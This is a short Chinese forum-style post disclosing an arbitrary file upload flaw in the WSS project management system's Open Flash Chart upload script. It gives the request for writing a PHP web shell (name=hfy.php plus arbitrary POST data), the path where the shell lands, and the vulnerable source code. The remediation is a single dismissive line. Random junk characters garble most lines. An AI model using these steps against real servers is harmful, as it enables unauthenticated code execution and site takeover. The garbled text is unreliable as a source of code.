WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
漏洞文件/chart/php-ofc-library/ofc_upload_image.php

利用：
; u( D" {) L, `9 N( T/ \/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

" q: A' u+ _6 C5 r; G. c1 HPost任意数据
8 {2 G; d0 [" u1 M5 x保存位置http://localhost/chart/tmp-upload-images/hfy.php


. |# ?3 d* c; b4 c# C1 G. e+ g最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~
2 \0 s7 v+ X4 k
<?php

) J# b, P  r* n/ T//
& y: O; N* j- E4 N// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
( g' U9 o/ Z' `7 {% k# Y  H//
/ T8 G; }1 p' e* A: f, M
/*
5 Z/ U* k; i% s+ c: R1 }0 s
print_r( $_GET );
4 z6 r$ o' m, |) Fprint_r( $_POST );
3 W% _+ K* r- y' s1 Y8 Vprint_r( $_FILES );

1 L. w( C" n3 ?4 f4 E7 i% a/ _; Cprint_r( $GLOBALS );
/ U4 H: [/ {; d1 ]4 C* x& Yprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
: R0 U- @1 ?6 m6 Z) _
*/
// default path for the image to be stored //
* W! D; S) I( n: M( A' M1 D$default_path = '../tmp-upload-images/';

: I" K1 `# A( N) M  f& Z. W5 @if (!file_exists($default_path)) mkdir($default_path, 0777, true);

! V; C; P* N3 y& w! X) l3 C// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

/ q2 A& P: U+ e" ], G8 M* Kecho 'Saving your image to: '. $destination;
, Z# Y0 m- l- S% Y& ~( \// print_r( $_POST );
$ }+ ~, k4 K( q. p// print_r( $_SERVER );
% J# r1 w8 V6 j/ e  L- R( |// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
4 Q" }7 _/ o. C! y3 w0 v// so PHP is a bit confused and $_POST is empty. But it has saved
3 _" u2 D+ c. T" D) A2 @% A+ Z// the raw bits into $HTTP_RAW_POST_DATA
//
0 E9 r; r! D6 [: @& y
3 h; M( k, A# }% P) E! R- ?$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
) V; G- A) I( f9 y7 B- U& \fclose($jfh);
, d" N, l9 x1 \! F0 z+ {
/ O+ |" ?& H5 Q7 [& R) P1 s//
// LOOK:
//
exit();
0 S* ?# U4 d! u+ Q+ A) `//
1 O3 v7 U3 s, ~3 G" @  S// PHP5:
2 f( ~2 y/ N* s$ U; V//

$ {8 C/ B4 M% c: Z: M5 s* o! z& f/ ^
- D9 b  @7 P* p) T& f2 U: e% K% [// default path for the image to be stored //
' ]: {! Z( \0 ^$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

: Y7 [5 x' {- m. H: O7 N// full path to the saved image including filename //
( u7 H# R* ~/ w1 q, l" B2 g$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

0 w- J) y' N  X' F// move the image into the specified directory //
9 }- ~& o5 ?9 l( Zif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
# h1 K% Y+ P+ M  X0 n" y$ e1 ~    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
0 i, J1 S' M; H( Q! F# R} else {
; e3 |* k$ W  ^! F8 ~2 g4 o    echo "FILE UPLOAD FAILED";
7 [9 f+ j$ B6 N' \& a* u}
& Y/ m  B: m( `* O6 w
3 r8 D3 {' ~% k4 P4 ?
3 P' p1 L* c2 v0 p% k?>


4 Z9 S+ X  Y0 Z: j( i( ?
, F$ L+ b  M4 V4 h) E" D
4 Z9 [1 D5 k5 W2 }& r9 u
) d. ~0 T. ]) W; [; Z, U$ y2 W
# {3 b' I+ @) _: o% {1 M修复方案：
# j/ ^7 J% y4 Q这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞


* c# }) c* G. _